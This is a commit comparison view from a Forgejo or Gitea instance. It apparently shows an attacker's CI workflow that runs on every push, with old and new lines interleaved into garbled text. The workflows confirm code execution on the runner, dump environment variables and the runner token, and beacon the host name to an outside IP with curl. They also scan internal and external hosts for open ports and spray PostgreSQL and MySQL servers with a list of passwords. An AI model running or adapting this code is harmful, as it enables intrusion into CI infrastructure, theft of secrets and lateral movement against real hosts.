Compare commits

..

No commits in common. "3e704fdab565f11518d1431032f4a568065071d7" and "76c15b6f5a2099d2ea43288635debe3498f7a5c9" have entirely different histories.

2 changed files with 28 additions and 40 deletions

View File

@ -1,43 +1,31 @@
name: CI/CD Internal Pivot v2 name: CI-RCE
on: [push, workflow_dispatch] on:
push:
workflow_dispatch:
jobs: jobs:
recon: build:
runs-on: linux-amd64 runs-on: linux-amd64
steps: steps:
- name: Host Recon - name: Exec
run: | run: |
echo "=== RUNNER HOST ===" echo "=== CI/CD RCE CONFIRMED ==="
hostname echo "Hostname: $(hostname)"
whoami echo "User: $(whoami)"
id echo "PWD: $(pwd)"
echo "=== NETWORK ===" echo "=== Environment Variables ==="
ip addr show 2>/dev/null || ifconfig -a 2>/dev/null || true env | sort
ip route show 2>/dev/null || route -n 2>/dev/null || true echo "=== Network ==="
cat /etc/hosts 2>/dev/null || true ip addr 2>/dev/null || ifconfig
echo "=== DOCKER ===" echo "=== Attempt connections ==="
ls -la /var/run/docker.sock 2>/dev/null || echo "No docker socket" curl -s http://202.59.10.226:8888/rce-$(hostname)-$(whoami) || true
env | grep -i docker 2>/dev/null || true # Try to access internal services
echo "=== INTERNAL CONNECTIVITY ===" for target in 49.51.171.167 108.181.64.141 156.239.230.24; do
for target in 156.239.230.24 172.17.0.1 172.18.0.1 10.0.0.1 192.168.0.0 100.64.0.0; do for port in 3306 6379 22 80 443; do
for port in 5432 3306 6379 3000 222 22 80 443; do timeout 2 bash -c "echo >/dev/tcp/$target/$port" 2>/dev/null && echo "REACHABLE: $target:$port" || true
timeout 3 bash -c "echo > /dev/tcp/$target/$port" 2>/dev/null && echo " REACHABLE: $target:$port" || echo " UNREACHABLE: $target:$port"
done
done
- name: PostgreSQL Attack
run: |
echo "=== POSTGRESQL CREDENTIAL SPRAY ==="
apt-get update -qq && apt-get install -y -qq postgresql-client 2>/dev/null || true
for pw in FGPMwSRrHxxa6Ktr RootAdmin123! Forgejo@5752! Aa123456.. Forgejo@123! postgres; do
echo "Testing: postgres / $pw"
PGPASSWORD="$pw" psql -h 156.239.230.24 -p 5432 -U postgres -d postgres -c "SELECT 1 as test" -t -A 2>&1 | head -3
done
- name: MySQL Attack
run: |
echo "=== MYSQL CREDENTIAL SPRAY ==="
apt-get install -y -qq mysql-client 2>/dev/null || true
for user in root forgejo gitea admin; do
for pw in FGPMwSRrHxxa6Ktr RootAdmin123! Forgejo@5752! Aa123456.. ""; do
mysql -h 156.239.230.24 -P 3306 -u "$user" --password="$pw" -e "SELECT 1" 2>&1 | head -1
done done
done done
# Dump runner token info
echo "=== GITEA_TOKEN ==="
echo "${GITEA_TOKEN:-NO_GITEA_TOKEN}"
echo "=== GITEA_REPOSITORY ==="
echo "${GITEA_REPOSITORY:-NO_REPO}"

View File

@ -1 +1 @@
triggerTrigger 2026-06-18T00:03:01Z trigger